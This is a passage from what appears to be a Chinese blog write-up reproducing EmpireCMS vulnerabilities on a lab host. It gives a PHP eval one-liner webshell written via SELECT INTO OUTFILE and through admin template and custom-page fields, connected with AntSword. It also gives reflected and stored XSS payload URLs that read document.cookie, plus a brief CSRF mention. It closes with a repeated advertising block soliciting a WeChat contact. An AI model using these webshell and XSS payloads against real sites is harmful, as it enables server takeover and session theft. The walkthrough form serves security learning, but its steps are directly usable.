这样是无法连接蚁剑的,尝试将tablename后改为一句话木马
当放包之后会出现表不存在等问题,不过不影响
hackbar后
同上的操作(或者也可以不执行这步,可以从链接当中知道文件的所在路径)
目录遍历,shell拿到了
代码注入获取shell
select … into outfile语句写入php一句话木马
select ‘<?php @eval($\_POST[LEOGG])?>’ into outfile ‘C:/phpStudy/PHPTutorial/WWW/EmpireCMS/e/admin/1.php’
出现下面这种错误明显是不能够成功的,它限制数据库的导入跟导出,判断secure_file_priv = NULL,所以当实战中出现在这种情况下是不能够用这种方法
添加上这句语句在做尝试
显示无法写入文件
漏洞复现文章出处:https://blog.csdn.net/m0_60716947/article/details/128354934
后台拿SHELL
模板–》公告模板–》JS调用登录模板
在此位置插入一句话木马,最终
源码当中的一句话木马已经被写入,证明肯定时写入到文件里面了
链接蚁剑,拿取shell
遍历目录
获取shell
栏目–》自定义页面–》管理自定义页面处可以写下getshell
成功在网站根目录写入webshell
连接蚁剑
目录遍历
(二)CSRF(跨站请求伪造)
1.在会员中心页面点击修改密码时抓包
将上述的html代码,编写成脚本放到phpstudy下的www目录
(三)XSS(跨站脚本攻击)
A、反射型:
通过目录扫描,我们可以知道很多存在漏洞的网页
1.漏洞代码位置:EmpireCMS/e/ViewImg/index.html
可以先创建栏目信息
然后点击图片
漏洞页面
#漏洞原理:url地址经过Request函数处理之后,
把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值
代码分析
if(Request(“url”)!=0){
document.write(
“<a title=“点击观看完整的图片…” href=”“+Request(“url”)+”" target=“_blank”>
<img src=“”+Request(“url”)+“” border=0
class=“picborder” onmousewheel=“return bbimg(this)”
οnlοad=“if(this.width>screen.width-500)this.style.width=screen.width-500;”>");
分析代码:通过window.location获取当前url地址,根据传入的url参数,获取当前参数的起始位置和结束位置。
代码没有对url的参数做过滤就直接拼接成a和img标签的属性的值,因此可以构造payload:? ?url=javascript:alert(/xss/)
例如,地址是:index.html?url=javascript:alert(document.cookie),经过Request函数处理就变成javascript:alert(document.cookie)
构造payload:
http://192.168.200.16/EmpireCMS/e/ViewImg/index.html?url=javascript:alert(document.cookie)
点击图片可以触发cookie,但是此漏洞我没有复现成功,是在控制器当中输入的javascript:alert(document.cookie)的指令
漏洞存在的文件是在/e/ViewImg/index.html。
分析代码:通过window.location获取当前url地址,根据传入的url参数,获取当前参数的起始位置和结束位置。
代码没有对url的参数做过滤就直接拼接成a和img标签的属性的值,因此可以构造payload:? ?url=javascript:alert(/xss/)
例如,地址是:index.html?url=javascript:alert(document.cookie),经过Request函数处理就变成javascript:alert(document.cookie)
案例:
2.软件作者栏目,软件简介栏目两处存在跨站脚本攻击漏洞,前台此连接处显示漏洞
图片内的栏目信息全部都含有如上图的xss漏洞
3.京股票验证国内新闻栏目含有XSS漏洞,并且需要创建信的栏目才可以实现
4.信息栏目处,几乎每一个大栏目下的都含有XSS漏洞
5.经验证,在栏目信息下的所有大的栏目下都含有前台显示的XSS漏洞
6.再次处,插入几条xss语句就会显示几个弹窗,在SQL名称处含有一处XSS
B、存储型
1.漏洞出现的页面在/e/admin/openpage/AdminPage.php
源码:
访问显示页面非法来源
构造发现依然无效
http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?mainfile=javascript:alert(‘xss’)
别的页面url地址中都会存在hash参数,例如ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6,参数是随机生成的,如果缺少这个参数,会提示非法来源(都要使用)
重新构造payload,有效!
http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert(‘xss’)
mainfile参数:获取cookie
http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert(document.cookie)
leftfile参数
http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&leftfile=javascript:alert(‘xss’)
而title参数,是无法显示出来页面信息的
http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&title=javascript:alert(%27xss%27)
2.栏目–》管理栏目
每次点进页面会自动触发
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算